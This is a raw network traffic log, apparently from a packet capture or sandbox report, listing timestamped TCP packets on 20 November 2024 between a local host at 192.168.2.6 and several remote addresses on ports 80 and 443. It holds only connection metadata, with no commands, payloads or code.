                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739412069 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739414930 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739432096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739433050 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739444971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739459991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739475965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739481926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739491940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739510059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739525080 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739531040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739531040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739542007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739553928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739557028 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739569902 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739577055 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739592075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739599943 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739600897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739634037 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739634037 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753362894 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753392935 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753401041 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753427982 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753443003 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753449917 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753453016 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753474951 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753498077 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.753520966 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.773855925 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.773956060 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.774010897 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.774055958 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.789539099 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.795494080 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.795509100 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.796664953 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.796725035 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.807085037 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.807195902 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.809165001 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.809181929 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820535898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820554018 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820580959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820595980 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820614100 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820637941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820637941 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820656061 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820663929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820682049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820703030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820705891 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820734024 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820735931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820750952 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820763111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820766926 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820781946 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820790052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820800066 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820801020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820815086 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820832014 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820857048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820863008 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820875883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820883036 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820898056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820913076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820916891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820930004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820945024 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820966005 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820966005 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820970058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.820986986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821002007 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821006060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821022034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821046114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821050882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821069002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821073055 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821086884 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821089983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821105957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821130991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821130991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821131945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821149111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821161985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821165085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821182013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821197033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821202993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821202993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821211100 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821239948 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821239948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821255922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821264982 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821271896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821285963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821290016 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821302891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821312904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821329117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821336031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821336031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821342945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821360111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821365118 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821376085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821388960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821397066 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821408987 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821423054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821439028 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821441889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821465015 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821479082 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821479082 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821491957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821528912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821544886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821557999 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821573019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821587086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821587086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821589947 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821643114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821643114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821655989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821671963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821710110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821722984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821737051 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821752071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821779966 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821779966 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821799040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821846008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821868896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821892023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821894884 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821904898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821919918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821926117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821938992 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821953058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821964979 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821966887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821984053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.821999073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822006941 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822024107 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822026014 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822041988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822061062 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822067022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822082996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822088003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822099924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822124004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822149038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822149992 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822149992 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822166920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822181940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822211027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822211027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822235107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822249889 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822252989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822268009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822297096 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822297096 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822307110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822320938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822323084 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822330952 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822352886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822369099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822386980 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822391987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822410107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822423935 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822438955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822439909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822438955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822458029 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822484016 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822491884 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822491884 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822499990 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822509050 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822518110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822544098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822552919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822561026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822561026 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822576046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822602034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822602987 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822602987 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822618008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822634935 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822649956 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822657108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822657108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822686911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822701931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822705030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822705030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822719097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822745085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822745085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822801113 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822817087 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822825909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822834015 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822848082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822861910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822873116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822906971 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822916985 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822932005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822948933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822978973 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822978973 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822997093 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.822997093 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823013067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823028088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823044062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823069096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823070049 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823086023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823105097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823112965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823123932 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823123932 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823127985 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823147058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823151112 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823162079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823168993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823179960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823218107 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.823218107 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838871956 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838886976 CET4434996513.107.246.40192.168.2.6
